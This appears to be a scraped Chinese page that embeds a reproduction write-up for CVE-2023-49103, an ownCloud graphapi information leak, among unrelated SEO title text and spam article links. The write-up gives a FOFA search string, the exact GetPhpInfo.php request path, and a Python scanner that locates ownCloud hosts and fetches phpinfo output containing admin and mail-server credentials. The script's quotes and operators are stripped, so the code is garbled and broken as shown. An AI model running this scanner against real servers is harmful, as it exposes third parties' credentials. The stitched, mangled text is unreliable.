当前位置: 首页 > news >正文

东莞网站建设哪家好装修公司 网站模板

news 2025/11/22 8:23:08
东莞网站建设哪家好,装修公司 网站模板,建造师个人业绩查询,程序员招聘求职的网站漏洞简介 ownCloud owncloud/graphapi 0.2.x在0.2.1之前和0.3.x在0.3.1之前存在漏洞。graphapi应用程序依赖于提供URL的第三方GetPhpInfo.php库。当访问此URL时#xff0c;会显示PHP环境的配置详细信息#xff08;phpinfo#xff09;。此信息包括Web服务器的所有环境变量会显示PHP环境的配置详细信息phpinfo。此信息包括Web服务器的所有环境变量包括敏感数据如ownCloud管理员密码、邮件服务器凭据和许可证密钥。 漏洞等级高危影响版本 ownCloud/graphapi 0.2.x 0.2.1 ownCloud/graphapi 0.3.x 0.3.1 漏洞类型信息泄露 产品简介     OwnCloud 是一个开源的私有云存储/网盘项目OwnCloud 跨平台支持 Windows、Mac、Android、iOS、Linux 等平台而且还提供了「网页版」以及 WebDAV 形式访问因此你几乎可以在任何电脑、手机设备上都能轻松获取和访问你的文件文档从而实现跨平台跨设备文件同步、共享、版本控制、团队协作等功能。 网络测绘 FOFAappownCloud 漏洞复现 手动验证POC ip:port/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php 注意当url存在/owncloud/时poc需要将该路径保留 即POC为 ip:port/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php python扫描验证脚本 #!/usr/bin/env python3 # -*- coding: UTF-8 -*-Project 漏洞复现POC File 【CVE-2023-49103】ownCloud graphapi信息泄露漏洞.py Author 星之尘 Date 2023/11/28 15:24 脚本说明import requests from requests import Timeout from urllib3.exceptions import InsecureRequestWarning headers {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36}def verification(url):requests.packages.urllib3.disable_warnings(InsecureRequestWarning)if not url.startswith(http://) and not url.startswith(https://):url http:// urlpath1 /index.php/loginpath2 /owncloud/index.php/loginencodetext1 url path1encodetext2 url path2finger_url [encodetext2, encodetext1]for url in finger_url:req1 requests.get(url, headersheaders, verifyFalse, timeout20)if ownCloud in req1.text:return urlreturn False def scan():verification_url verification(url)print(f扫描目标: {verification_url})print(---------------------------------------------------)try:if owncloud in verification_url:exp_path /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.phpelse:exp_path /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.phpexpurl exp_pathrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)req2 requests.post(exp, headersheaders, verifyFalse, timeout20)if req2.status_code 200 and phpinfo() in req2.text:print(f[] {url} 存在【CVE-2023-49103】ownCloud graphapi信息泄露漏洞;)else:print(f[-] {url} 不存在【CVE-2023-49103】ownCloud graphapi信息泄露漏洞)except Timeout:print(f[!] 请求超时跳过URL: {url}, yellow)except Exception as e:if HTTPSConnectionPool in str(e) or Burp Suite Professional in str(e):print(f[-] {url} 证书校验错误或者证书被拒绝)else:print(str(e))if __name__ __main__:url your ip:portverification(url)scan()
http://www.zqtcl.cn/news/431748/

相关文章:

  • 在线课程网站开发的研究意义网站开发需要哪些知识
  • 深圳网站优化怎么做手工艺品外贸出口公司网站建设方案
  • 从网站优化之角度出发做网站策划wordpress邀请码插件
  • 大学营销型网站建设实训课程o2o的四种营销模式
  • 咋做网站代码背景图宁远网站建设
  • 有哪些可以做网站的企业网站想换个风格怎么做
  • 怎么在百度搜索自己的网站在电脑上建设个人网站
  • wordpress网站菜单固定电商未来发展趋势前景
  • 五合一网站建设费用python 做网站 用哪个框架好
  • 波莱网站开发动态域名可以做网站吗
  • 网站建设 赣icp 南昌面馆装修设计
  • 福田附近公司做网站建设多少钱网站建设文献综述范文
  • 镇江网站建设设计建设银行投诉网站首页
  • 石家庄个人做网站广州全网络营销
  • html5网站建设加盟wordpress 4.8.6
  • 携程网站建设的基本特点哈尔滨做平台网站平台公司
  • 网站建设入门解读国模 wordpress
  • 网站购物车js代码怎么做制作app的软件有哪些
  • 36氪网站用什么程序做的互联网门户网站建设
  • 视频聚合网站怎么做不侵权wordpress 管理员插件
  • 传媒网站后台免费模板网站建设的进度计划
  • 如何做网站排名合肥全网优化
  • 网站建设招聘信息官网 wordpress
  • 城阳网站开发公司网页制作与设计在哪搜题
  • 做网站算运营吗grace wordpress
  • 厦门建设网站建站制作网页动画的软件
  • 百度提交网站收录入口郑州网站app开发
  • 自己的身份已经网站备案了品牌建设目标包括哪些方面
  • 中国免费网站服务器下载保定网站制作系统
  • 深圳app网站设计数据库网站建设公司